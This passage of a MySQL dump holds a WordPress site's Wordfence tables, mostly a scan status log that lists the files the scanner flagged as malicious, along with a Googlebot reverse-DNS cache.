/*!40000 ALTER TABLE `wp_wfnotifications` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfpendingissues`
--

DROP TABLE IF EXISTS `wp_wfpendingissues`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfpendingissues` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `time` int(10) unsigned NOT NULL,
  `lastUpdated` int(10) unsigned NOT NULL,
  `status` varchar(10) NOT NULL,
  `type` varchar(20) NOT NULL,
  `severity` tinyint(3) unsigned NOT NULL,
  `ignoreP` char(32) NOT NULL,
  `ignoreC` char(32) NOT NULL,
  `shortMsg` varchar(255) NOT NULL,
  `longMsg` text DEFAULT NULL,
  `data` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `lastUpdated` (`lastUpdated`),
  KEY `status` (`status`),
  KEY `ignoreP` (`ignoreP`),
  KEY `ignoreC` (`ignoreC`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfpendingissues`
--

LOCK TABLES `wp_wfpendingissues` WRITE;
/*!40000 ALTER TABLE `wp_wfpendingissues` DISABLE KEYS */;
INSERT INTO `wp_wfpendingissues` VALUES (1,1629633433,1629633433,'new','knownfile',75,'2d8d8fdae0f3b4d928cf66463a190130','e464f21615bce64989e4c6a2291f9e25','WordPress core file modified: wp-includes/vars.php','This WordPress core file has been modified and differs from the original file distributed with this version of WordPress.','a:6:{s:4:\"file\";s:20:\"wp-includes/vars.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:1;s:6:\"canFix\";b:1;s:9:\"canDelete\";b:0;s:10:\"haveIssues\";s:4:\"core\";}');
/*!40000 ALTER TABLE `wp_wfpendingissues` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfreversecache`
--

DROP TABLE IF EXISTS `wp_wfreversecache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfreversecache` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `host` varchar(255) NOT NULL,
  `lastUpdate` int(10) unsigned NOT NULL,
  PRIMARY KEY (`IP`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfreversecache`
--

LOCK TABLES `wp_wfreversecache` WRITE;
/*!40000 ALTER TABLE `wp_wfreversecache` DISABLE KEYS */;
INSERT INTO `wp_wfreversecache` VALUES ('\0\0\0\0\0\0\0\0\0\0��B�B','crawl-66-249-66-4.googlebot.com',1629753199),('\0\0\0\0\0\0\0\0\0\0��B�B','crawl-66-249-66-6.googlebot.com',1629752071),('\0\0\0\0\0\0\0\0\0\0��B�B','crawl-66-249-66-8.googlebot.com',1629745812),('\0\0\0\0\0\0\0\0\0\0��B�B\n','crawl-66-249-66-10.googlebot.com',1629759268),('\0\0\0\0\0\0\0\0\0\0��B�B','crawl-66-249-66-12.googlebot.com',1629791145),('\0\0\0\0\0\0\0\0\0\0��B�B\Z','crawl-66-249-66-26.googlebot.com',1629746559),('\0\0\0\0\0\0\0\0\0\0��B�B�','crawl-66-249-66-211.googlebot.com',1629748904),('\0\0\0\0\0\0\0\0\0\0��B�E�','crawl-66-249-69-148.googlebot.com',1629835793),('\0\0\0\0\0\0\0\0\0\0��B�E�','crawl-66-249-69-149.googlebot.com',1629835793),('\0\0\0\0\0\0\0\0\0\0��B�E�','crawl-66-249-69-151.googlebot.com',1629801263),('\0\0\0\0\0\0\0\0\0\0��B�E�','crawl-66-249-69-152.googlebot.com',1629801254),('\0\0\0\0\0\0\0\0\0\0��B�E�','crawl-66-249-69-153.googlebot.com',1629803532);
/*!40000 ALTER TABLE `wp_wfreversecache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfsnipcache`
--

DROP TABLE IF EXISTS `wp_wfsnipcache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfsnipcache` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `IP` varchar(45) NOT NULL DEFAULT '',
  `expiration` timestamp NOT NULL DEFAULT current_timestamp(),
  `body` varchar(255) NOT NULL DEFAULT '',
  `count` int(10) unsigned NOT NULL DEFAULT 0,
  `type` int(10) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`),
  KEY `expiration` (`expiration`),
  KEY `IP` (`IP`),
  KEY `type` (`type`)
) ENGINE=InnoDB AUTO_INCREMENT=2968 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfsnipcache`
--

LOCK TABLES `wp_wfsnipcache` WRITE;
/*!40000 ALTER TABLE `wp_wfsnipcache` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfsnipcache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfstatus`
--

DROP TABLE IF EXISTS `wp_wfstatus`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfstatus` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `ctime` double(17,6) unsigned NOT NULL,
  `level` tinyint(3) unsigned NOT NULL,
  `type` char(5) NOT NULL,
  `msg` varchar(1000) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`ctime`),
  KEY `k2` (`type`)
) ENGINE=InnoDB AUTO_INCREMENT=3446 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfstatus`
--

LOCK TABLES `wp_wfstatus` WRITE;
/*!40000 ALTER TABLE `wp_wfstatus` DISABLE KEYS */;
INSERT INTO `wp_wfstatus` VALUES (2234,1628337091.432714,2,'info','Analyzed 200 files containing 3.19 MB of data so far'),(2235,1628337094.026677,2,'info','Analyzed 300 files containing 4.47 MB of data so far'),(2236,1628337097.555833,2,'info','Analyzed 400 files containing 7.22 MB of data so far'),(2237,1628337102.157637,2,'info','Analyzed 500 files containing 8.08 MB of data so far'),(2238,1628337104.985189,2,'info','Analyzed 600 files containing 8.93 MB of data so far'),(2239,1628337107.838798,2,'info','Analyzed 700 files containing 10.07 MB of data so far'),(2240,1628337111.505306,2,'info','Analyzed 800 files containing 11.1 MB of data so far'),(2241,1628337115.214659,2,'info','Analyzed 900 files containing 12.84 MB of data so far'),(2242,1628337120.068062,2,'info','Analyzed 1000 files containing 18.32 MB of data so far'),(2243,1628337122.841135,2,'info','Analyzed 1100 files containing 19.82 MB of data so far'),(2244,1628337127.079534,2,'info','Analyzed 1200 files containing 21.03 MB of data so far'),(2245,1628337130.880540,2,'info','Analyzed 1300 files containing 21.72 MB of data so far'),(2246,1628337134.951545,2,'info','Analyzed 1400 files containing 22.66 MB of data so far'),(2247,1628337138.307566,2,'info','Analyzed 1500 files containing 22.69 MB of data so far'),(2248,1628337140.879202,2,'info','Analyzed 1600 files containing 22.72 MB of data so far'),(2249,1628337143.636793,2,'info','Analyzed 1700 files containing 24.07 MB of data so far'),(2250,1628337147.175047,2,'info','Analyzed 1800 files containing 24.71 MB of data so far'),(2251,1628337155.911639,2,'info','Analyzed 1900 files containing 27.12 MB of data so far'),(2252,1628337159.487844,2,'info','Analyzed 2000 files containing 27.52 MB of data so far'),(2253,1628337162.115317,2,'info','Analyzed 2100 files containing 28.11 MB of data so far'),(2254,1628337165.207491,2,'info','Analyzed 2200 files containing 29.56 MB of data so far'),(2255,1628337168.842332,2,'info','Analyzed 2300 files containing 31.12 MB of data so far'),(2256,1628337173.164805,2,'info','Analyzed 2400 files containing 32.04 MB of data so far'),(2257,1628337175.779013,2,'info','Analyzed 2500 files containing 33.9 MB of data so far'),(2258,1628337179.123747,2,'info','Analyzed 2600 files containing 35.1 MB of data so far'),(2259,1628337182.315434,2,'info','Analyzed 2700 files containing 36.94 MB of data so far'),(2260,1628337185.220541,2,'info','Analyzed 2800 files containing 39.1 MB of data so far'),(2261,1628337189.688417,2,'info','Analyzed 2900 files containing 41.71 MB of data so far'),(2262,1628337192.998601,2,'info','Analyzed 3000 files containing 48.95 MB of data so far'),(2263,1628337195.696828,2,'info','Analyzed 3100 files containing 50.98 MB of data so far'),(2264,1628337200.459362,2,'info','Analyzed 3200 files containing 52.86 MB of data so far'),(2265,1628337204.242159,2,'info','Analyzed 3300 files containing 55.06 MB of data so far'),(2266,1628337206.306098,2,'info','Analyzed 3400 files containing 56.25 MB of data so far'),(2267,1628337208.844172,2,'info','Analyzed 3500 files containing 57.02 MB of data so far'),(2268,1628337211.212712,2,'info','Analyzed 3600 files containing 57.57 MB of data so far'),(2269,1628337214.505000,2,'info','Analyzed 3700 files containing 59.08 MB of data so far'),(2270,1628337217.059236,2,'info','Analyzed 3800 files containing 59.45 MB of data so far'),(2271,1628337222.188685,2,'info','Analyzed 3900 files containing 60.65 MB of data so far'),(2272,1628337224.761781,2,'info','Analyzed 4000 files containing 60.94 MB of data so far'),(2273,1628337228.017979,2,'info','Analyzed 4100 files containing 63.62 MB of data so far'),(2274,1628337232.278888,2,'info','Analyzed 4200 files containing 65.23 MB of data so far'),(2275,1628337235.069787,2,'info','Analyzed 4300 files containing 67.66 MB of data so far'),(2276,1628337239.283354,2,'info','Analyzed 4400 files containing 69.04 MB of data so far'),(2277,1628337244.138426,2,'info','Analyzed 4500 files containing 71.8 MB of data so far'),(2278,1628337247.078845,2,'info','Analyzed 4600 files containing 74.66 MB of data so far'),(2279,1628337250.426835,2,'info','Analyzed 4700 files containing 75.12 MB of data so far'),(2280,1628337256.880567,2,'info','Analyzed 4800 files containing 76.29 MB of data so far'),(2281,1628337260.085144,2,'info','Analyzed 4900 files containing 77.09 MB of data so far'),(2282,1628337261.739895,2,'info','Analyzed 5000 files containing 77.68 MB of data so far'),(2283,1628337264.109382,2,'info','Analyzed 5100 files containing 78.71 MB of data so far'),(2284,1628337267.271529,2,'info','Analyzed 5200 files containing 79.65 MB of data so far'),(2285,1628337271.539906,2,'info','Analyzed 5300 files containing 80.65 MB of data so far'),(2286,1628337274.860335,2,'info','Analyzed 5400 files containing 85.1 MB of data so far'),(2287,1628337278.501191,2,'info','Analyzed 5500 files containing 85.42 MB of data so far'),(2288,1628337282.069745,2,'info','Analyzed 5600 files containing 86.54 MB of data so far'),(2289,1628337285.095285,2,'info','Analyzed 5700 files containing 87.47 MB of data so far'),(2290,1628337288.380736,2,'info','Analyzed 5800 files containing 89.54 MB of data so far'),(2291,1628337290.855509,2,'info','Analyzed 5900 files containing 89.94 MB of data so far'),(2292,1628337292.328140,2,'info','Analyzed 6000 files containing 91.06 MB of data so far'),(2293,1628337295.914030,2,'info','Analyzed 6100 files containing 91.87 MB of data so far'),(2294,1628337299.607131,2,'info','Analyzed 6200 files containing 92.48 MB of data so far'),(2295,1628337306.298438,2,'info','Analyzed 6300 files containing 92.83 MB of data so far'),(2296,1628337309.297864,2,'info','Analyzed 6400 files containing 93.98 MB of data so far'),(2297,1628337311.794550,2,'info','Analyzed 6500 files containing 94.31 MB of data so far'),(2298,1628337315.892916,2,'info','Analyzed 6600 files containing 97.78 MB of data so far'),(2299,1628337320.504219,2,'info','Analyzed 6700 files containing 98.59 MB of data so far'),(2300,1628337322.040358,2,'info','Analyzed 6800 files containing 99.52 MB of data so far'),(2301,1628337325.075362,2,'info','Analyzed 6900 files containing 101.55 MB of data so far'),(2302,1628337329.696005,2,'info','Analyzed 7000 files containing 103.88 MB of data so far'),(2303,1628337332.610041,2,'info','Analyzed 7100 files containing 105.3 MB of data so far'),(2304,1628337338.213669,2,'info','Analyzed 7200 files containing 114.81 MB of data so far'),(2305,1628337341.183756,2,'info','Analyzed 7300 files containing 120.22 MB of data so far'),(2306,1628337344.560596,2,'info','Analyzed 7400 files containing 121.61 MB of data so far'),(2307,1628337347.585135,2,'info','Analyzed 7500 files containing 123.98 MB of data so far'),(2308,1628337351.464866,2,'info','Analyzed 7600 files containing 127.99 MB of data so far'),(2309,1628337355.164907,2,'info','Analyzed 7700 files containing 129.72 MB of data so far'),(2310,1628337358.401307,2,'info','Analyzed 7800 files containing 131.29 MB of data so far'),(2311,1628337360.155601,2,'info','Analyzed 7831 files containing 131.7 MB of data.'),(2319,1628337361.950895,2,'info','Starting scan of file contents'),(2320,1628337362.960284,2,'info','Scanned contents of 39 additional files at 38.85 per second'),(2321,1628337363.962628,2,'info','Scanned contents of 93 additional files at 46.36 per second'),(2322,1628337364.965652,2,'info','Scanned contents of 142 additional files at 47.19 per second'),(2323,1628337365.986077,2,'info','Scanned contents of 164 additional files at 40.70 per second'),(2324,1628337367.022969,2,'info','Scanned contents of 187 additional files at 36.91 per second'),(2325,1628337367.537276,2,'info','Scanned contents of 201 additional files at 36.02 per second'),(2326,1628337367.547584,2,'info','Asking Wordfence to check URLs against malware list.'),(2327,1628337367.558524,2,'info','Checking 357 host keys against Wordfence scanning servers.'),(2328,1628337368.316172,2,'info','Done host key check.'),(2329,1628337370.100361,2,'info','Done file contents scan'),(2330,1628337370.102858,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/brickyard/docs/assets/blueprint-css/plugins/rtl/rtl/index.php'),(2331,1628337370.108988,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/auberge/includes/plugins/smart-slider/smart-slider/index.php'),(2332,1628337370.113008,2,'info','Adding issue: File appears to be malicious or unsafe: wp-includes/vars.php'),(2333,1628337370.122760,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/css/colors/ectoplasm/0.php'),(2334,1628337370.126819,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/newsmag/assets/sass/elements/elements/index.php'),(2335,1628337370.131093,2,'info','Adding issue: File appears to be malicious or unsafe: wp-includes/class.wp-includes.php'),(2336,1628337370.143130,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/gambit/inc/widgets/roman.php'),(2342,1628337371.224835,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(2343,1628337371.227433,2,'info','Checking 427 host keys against Wordfence scanning servers.'),(2344,1628337372.044660,2,'info','Done host key check.'),(2345,1628337372.099344,2,'info','Done examining URLs'),(2350,1628337372.693492,2,'info','Starting password strength check on 1 user.'),(2357,1628337377.150570,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(2358,1628337377.152621,2,'info','Done examining URLs'),(2360,1628337377.383691,1,'info','-------------------'),(2361,1628337377.386747,2,'info','Wordfence used 22.82 MB of memory for scan. Server peak memory usage was: 42.82 MB'),(2362,1628337377.388621,1,'info','Scan Complete. Scanned 7831 files, 5 plugins, 38 themes, 82 posts, 0 comments and 823 URLs in 5 minutes 10 seconds.'),(2365,1628418836.855230,1,'info','Initiating quick scan'),(2370,1628418838.255815,1,'info','-------------------'),(2371,1628418838.293471,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(2372,1628418838.314158,1,'info','Quick Scan Complete. Scanned in 2 seconds.'),(2375,1628505282.690775,1,'info','Initiating quick scan'),(2380,1628505283.638792,1,'info','-------------------'),(2381,1628505283.658955,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 12 MB'),(2382,1628505283.669115,1,'info','Quick Scan Complete. Scanned in 1 second.'),(2385,1628591636.895626,1,'info','Initiating quick scan'),(2390,1628591637.385060,1,'info','-------------------'),(2391,1628591637.402596,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 12 MB'),(2392,1628591637.405104,1,'info','Quick Scan Complete. Scanned in 1 second.'),(2394,1628596283.609358,1,'info','Scheduled Wordfence scan starting at Tuesday 10th of August 2021 11:51:23 AM'),(2396,1628596284.510777,1,'info','Contacting Wordfence to initiate scan'),(2403,1628596291.792094,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(2404,1628596291.805841,2,'info','The disk has 3464959.17 MB available'),(2412,1628596292.060842,2,'info','Getting plugin list from WordPress'),(2413,1628596292.091483,2,'info','Found 4 plugins'),(2414,1628596292.102348,2,'info','Getting theme list from WordPress'),(2415,1628596292.162057,2,'info','Found 38 themes'),(2427,1628596294.754045,2,'info','500 files indexed'),(2428,1628596294.903408,2,'info','1000 files indexed'),(2429,1628596295.133016,2,'info','1500 files indexed'),(2430,1628596295.192832,2,'info','2000 files indexed'),(2431,1628596295.297615,2,'info','2500 files indexed'),(2432,1628596295.480385,2,'info','3000 files indexed'),(2433,1628596295.539690,2,'info','3500 files indexed'),(2434,1628596295.666198,2,'info','4000 files indexed'),(2435,1628596295.818704,2,'info','4500 files indexed'),(2436,1628596295.913342,2,'info','5000 files indexed'),(2437,1628596296.025529,2,'info','5500 files indexed'),(2438,1628596296.363817,2,'info','6000 files indexed'),(2439,1628596296.388662,2,'info','6500 files indexed'),(2440,1628596296.530332,2,'info','7000 files indexed'),(2441,1628596296.600308,2,'info','7500 files indexed'),(2442,1628596296.704288,2,'info','7831 files indexed'),(2443,1628596300.981559,2,'info','Analyzed 100 files containing 1.62 MB of data so far'),(2444,1628596305.969571,2,'info','Analyzed 200 files containing 3.19 MB of data so far'),(2445,1628596310.147524,2,'info','Analyzed 300 files containing 4.47 MB of data so far'),(2446,1628596313.766654,2,'info','Analyzed 400 files containing 7.22 MB of data so far'),(2447,1628596317.364266,2,'info','Analyzed 500 files containing 8.08 MB of data so far'),(2448,1628596322.101083,2,'info','Analyzed 600 files containing 8.93 MB of data so far'),(2449,1628596327.137205,2,'info','Analyzed 700 files containing 10.07 MB of data so far'),(2450,1628596331.261565,2,'info','Analyzed 800 files containing 11.1 MB of data so far'),(2451,1628596336.024568,2,'info','Analyzed 900 files containing 12.84 MB of data so far'),(2452,1628596339.800945,2,'info','Analyzed 1000 files containing 18.32 MB of data so far'),(2453,1628596344.288930,2,'info','Analyzed 1100 files containing 19.82 MB of data so far'),(2454,1628596347.770438,2,'info','Analyzed 1200 files containing 21.03 MB of data so far'),(2455,1628596352.646771,2,'info','Analyzed 1300 files containing 21.72 MB of data so far'),(2456,1628596356.294620,2,'info','Analyzed 1400 files containing 22.66 MB of data so far'),(2457,1628596361.374585,2,'info','Analyzed 1500 files containing 22.69 MB of data so far'),(2458,1628596364.001804,2,'info','Analyzed 1600 files containing 22.72 MB of data so far'),(2459,1628596369.122804,2,'info','Analyzed 1700 files containing 24.07 MB of data so far'),(2460,1628596373.315239,2,'info','Analyzed 1800 files containing 24.71 MB of data so far'),(2461,1628596377.112622,2,'info','Analyzed 1900 files containing 27.12 MB of data so far'),(2462,1628596381.328603,2,'info','Analyzed 2000 files containing 27.52 MB of data so far'),(2463,1628596386.215001,2,'info','Analyzed 2100 files containing 28.11 MB of data so far'),(2464,1628596389.516401,2,'info','Analyzed 2200 files containing 29.56 MB of data so far'),(2465,1628596392.966138,2,'info','Analyzed 2300 files containing 31.12 MB of data so far'),(2466,1628596396.301862,2,'info','Analyzed 2400 files containing 32.04 MB of data so far'),(2467,1628596399.568653,2,'info','Analyzed 2500 files containing 33.9 MB of data so far'),(2468,1628596405.310538,2,'info','Analyzed 2600 files containing 35.1 MB of data so far'),(2469,1628596408.650401,2,'info','Analyzed 2700 files containing 36.94 MB of data so far'),(2470,1628596411.788507,2,'info','Analyzed 2800 files containing 39.1 MB of data so far'),(2471,1628596414.736325,2,'info','Analyzed 2900 files containing 41.71 MB of data so far'),(2472,1628596417.872859,2,'info','Analyzed 3000 files containing 48.95 MB of data so far'),(2473,1628596422.342725,2,'info','Analyzed 3100 files containing 50.98 MB of data so far'),(2474,1628596426.744634,2,'info','Analyzed 3200 files containing 52.86 MB of data so far'),(2475,1628596429.850887,2,'info','Analyzed 3300 files containing 55.06 MB of data so far'),(2476,1628596433.331015,2,'info','Analyzed 3400 files containing 56.25 MB of data so far'),(2477,1628596435.921260,2,'info','Analyzed 3500 files containing 57.02 MB of data so far'),(2478,1628596440.073756,2,'info','Analyzed 3600 files containing 57.57 MB of data so far'),(2479,1628596443.394257,2,'info','Analyzed 3700 files containing 59.08 MB of data so far'),(2480,1628596447.541889,2,'info','Analyzed 3800 files containing 59.45 MB of data so far'),(2481,1628596450.671870,2,'info','Analyzed 3900 files containing 60.65 MB of data so far'),(2482,1628596454.807114,2,'info','Analyzed 4000 files containing 60.94 MB of data so far'),(2483,1628596457.631558,2,'info','Analyzed 4100 files containing 63.62 MB of data so far'),(2484,1628596460.772239,2,'info','Analyzed 4200 files containing 65.23 MB of data so far'),(2485,1628596464.154795,2,'info','Analyzed 4300 files containing 67.66 MB of data so far'),(2486,1628596466.806084,2,'info','Analyzed 4400 files containing 69.04 MB of data so far'),(2487,1628596470.657212,2,'info','Analyzed 4500 files containing 71.8 MB of data so far'),(2488,1628596473.621445,2,'info','Analyzed 4600 files containing 74.66 MB of data so far'),(2489,1628596476.941211,2,'info','Analyzed 4700 files containing 75.12 MB of data so far'),(2490,1628596479.627076,2,'info','Analyzed 4800 files containing 76.29 MB of data so far'),(2491,1628596481.869388,2,'info','Analyzed 4900 files containing 77.09 MB of data so far'),(2492,1628596484.745741,2,'info','Analyzed 5000 files containing 77.68 MB of data so far'),(2493,1628596491.163390,2,'info','Analyzed 5100 files containing 78.71 MB of data so far'),(2494,1628596493.840236,2,'info','Analyzed 5200 files containing 79.65 MB of data so far'),(2495,1628596497.440799,2,'info','Analyzed 5300 files containing 80.65 MB of data so far'),(2496,1628596501.186210,2,'info','Analyzed 5400 files containing 85.1 MB of data so far'),(2497,1628596505.415852,2,'info','Analyzed 5500 files containing 85.42 MB of data so far'),(2498,1628596508.921128,2,'info','Analyzed 5600 files containing 86.54 MB of data so far'),(2499,1628596511.990153,2,'info','Analyzed 5700 files containing 87.47 MB of data so far'),(2500,1628596515.129022,2,'info','Analyzed 5800 files containing 89.54 MB of data so far'),(2501,1628596517.604645,2,'info','Analyzed 5900 files containing 89.94 MB of data so far'),(2502,1628596521.665364,2,'info','Analyzed 6000 files containing 91.06 MB of data so far'),(2503,1628596524.383448,2,'info','Analyzed 6100 files containing 91.87 MB of data so far'),(2504,1628596527.136856,2,'info','Analyzed 6200 files containing 92.48 MB of data so far'),(2505,1628596529.878650,2,'info','Analyzed 6300 files containing 92.83 MB of data so far'),(2506,1628596532.809263,2,'info','Analyzed 6400 files containing 93.98 MB of data so far'),(2507,1628596536.680379,2,'info','Analyzed 6500 files containing 94.31 MB of data so far'),(2508,1628596539.836378,2,'info','Analyzed 6600 files containing 97.78 MB of data so far'),(2509,1628596543.099457,2,'info','Analyzed 6700 files containing 98.6 MB of data so far'),(2510,1628596545.580880,2,'info','Analyzed 6800 files containing 99.52 MB of data so far'),(2511,1628596549.005015,2,'info','Analyzed 6900 files containing 101.55 MB of data so far'),(2512,1628596552.902929,2,'info','Analyzed 7000 files containing 103.88 MB of data so far'),(2513,1628596556.049549,2,'info','Analyzed 7100 files containing 105.3 MB of data so far'),(2514,1628596560.073407,2,'info','Analyzed 7200 files containing 114.81 MB of data so far'),(2515,1628596564.207748,2,'info','Analyzed 7300 files containing 120.22 MB of data so far'),(2516,1628596568.573783,2,'info','Analyzed 7400 files containing 121.61 MB of data so far'),(2517,1628596573.287399,2,'info','Analyzed 7500 files containing 123.98 MB of data so far'),(2518,1628596576.703382,2,'info','Analyzed 7600 files containing 128 MB of data so far'),(2519,1628596579.586674,2,'info','Analyzed 7700 files containing 129.72 MB of data so far'),(2520,1628596583.819352,2,'info','Analyzed 7800 files containing 131.29 MB of data so far'),(2521,1628596586.270238,2,'info','Analyzed 7831 files containing 131.71 MB of data.'),(2529,1628596587.839379,2,'info','Starting scan of file contents'),(2530,1628596588.879335,2,'info','Scanned contents of 26 additional files at 25.97 per second'),(2531,1628596589.928779,2,'info','Scanned contents of 62 additional files at 30.23 per second'),(2532,1628596590.977058,2,'info','Scanned contents of 70 additional files at 22.59 per second'),(2533,1628596591.993330,2,'info','Scanned contents of 106 additional files at 25.76 per second'),(2534,1628596593.032980,2,'info','Scanned contents of 138 additional files at 26.77 per second'),(2535,1628596594.058037,2,'info','Scanned contents of 162 additional files at 26.21 per second'),(2536,1628596595.118301,2,'info','Scanned contents of 187 additional files at 25.83 per second'),(2537,1628596595.505315,2,'info','Scanned contents of 201 additional files at 26.35 per second'),(2538,1628596595.514107,2,'info','Asking Wordfence to check URLs against malware list.'),(2539,1628596595.518675,2,'info','Checking 357 host keys against Wordfence scanning servers.'),(2540,1628596596.297123,2,'info','Done host key check.'),(2541,1628596597.146773,2,'info','Done file contents scan'),(2542,1628596597.158001,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/brickyard/docs/assets/blueprint-css/plugins/rtl/rtl/index.php'),(2543,1628596597.180617,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/auberge/includes/plugins/smart-slider/smart-slider/index.php'),(2544,1628596597.204256,2,'info','Adding issue: File appears to be malicious or unsafe: wp-includes/vars.php'),(2545,1628596597.228016,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/css/colors/ectoplasm/0.php'),(2546,1628596597.251783,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/newsmag/assets/sass/elements/elements/index.php'),(2547,1628596597.273179,2,'info','Adding issue: File appears to be malicious or unsafe: wp-includes/class.wp-includes.php'),(2548,1628596597.294222,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/gambit/inc/widgets/roman.php'),(2554,1628596599.712800,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(2555,1628596599.725942,2,'info','Checking 427 host keys against Wordfence scanning servers.'),(2556,1628596600.509485,2,'info','Done host key check.'),(2557,1628596600.520083,2,'info','Done examining URLs'),(2562,1628596600.976744,2,'info','Starting password strength check on 1 user.'),(2569,1628596605.416905,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(2570,1628596605.419412,2,'info','Done examining URLs'),(2572,1628596605.593242,1,'info','-------------------'),(2573,1628596605.632211,2,'info','Wordfence used 21.25 MB of memory for scan. Server peak memory usage was: 41.25 MB'),(2574,1628596605.643354,1,'info','Scan Complete. Scanned 7831 files, 5 plugins, 38 themes, 82 posts, 0 comments and 823 URLs in 5 minutes 20 seconds.'),(2577,1628678051.128449,1,'info','Initiating quick scan'),(2582,1628678051.796287,1,'info','-------------------'),(2583,1628678051.839095,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 22 MB'),(2584,1628678051.856834,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2587,1628764644.579580,1,'info','Initiating quick scan'),(2592,1628764645.312688,1,'info','-------------------'),(2593,1628764645.339610,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(2594,1628764645.350980,1,'info','Quick Scan Complete. Scanned in 1 second.'),(2597,1628850960.381903,1,'info','Initiating quick scan'),(2602,1628850961.299694,1,'info','-------------------'),(2603,1628850961.326212,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(2604,1628850961.339747,1,'info','Quick Scan Complete. Scanned in 1 second.'),(2606,1628855565.755264,1,'info','Scheduled Wordfence scan starting at Friday 13th of August 2021 11:52:45 AM'),(2608,1628855566.565435,1,'info','Contacting Wordfence to initiate scan'),(2615,1628855574.405606,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(2616,1628855574.408754,2,'info','The disk has 3464321.23 MB available'),(2624,1628855574.752162,2,'info','Getting plugin list from WordPress'),(2625,1628855574.804082,2,'info','Found 4 plugins'),(2626,1628855574.814649,2,'info','Getting theme list from WordPress'),(2627,1628855574.872950,2,'info','Found 38 themes'),(2639,1628855577.198788,2,'info','500 files indexed'),(2640,1628855577.315836,2,'info','1000 files indexed'),(2641,1628855577.364349,2,'info','1500 files indexed'),(2642,1628855577.426600,2,'info','2000 files indexed'),(2643,1628855577.565453,2,'info','2500 files indexed'),(2644,1628855577.693974,2,'info','3000 files indexed'),(2645,1628855577.874145,2,'info','3500 files indexed'),(2646,1628855578.092810,2,'info','4000 files indexed'),(2647,1628855578.184681,2,'info','4500 files indexed'),(2648,1628855578.287008,2,'info','5000 files indexed'),(2649,1628855578.400008,2,'info','5500 files indexed'),(2650,1628855578.597884,2,'info','6000 files indexed'),(2651,1628855578.665748,2,'info','6500 files indexed'),(2652,1628855578.717486,2,'info','7000 files indexed'),(2653,1628855578.744491,2,'info','7500 files indexed'),(2654,1628855578.774713,2,'info','7831 files indexed'),(2655,1628855584.647047,2,'info','Analyzed 100 files containing 1.62 MB of data so far'),(2656,1628855589.168692,2,'info','Analyzed 200 files containing 3.19 MB of data so far'),(2657,1628855591.634298,2,'info','Analyzed 300 files containing 4.47 MB of data so far'),(2658,1628855595.656591,2,'info','Analyzed 400 files containing 7.22 MB of data so far'),(2659,1628855599.845381,2,'info','Analyzed 500 files containing 8.08 MB of data so far'),(2660,1628855604.313292,2,'info','Analyzed 600 files containing 8.93 MB of data so far'),(2661,1628855607.938158,2,'info','Analyzed 700 files containing 10.07 MB of data so far'),(2662,1628855611.204418,2,'info','Analyzed 800 files containing 11.1 MB of data so far'),(2663,1628855617.815767,2,'info','Analyzed 900 files containing 12.84 MB of data so far'),(2664,1628855620.818617,2,'info','Analyzed 1000 files containing 18.32 MB of data so far'),(2665,1628855624.264354,2,'info','Analyzed 1100 files containing 19.82 MB of data so far'),(2666,1628855628.498027,2,'info','Analyzed 1200 files containing 21.03 MB of data so far'),(2667,1628855632.727951,2,'info','Analyzed 1300 files containing 21.72 MB of data 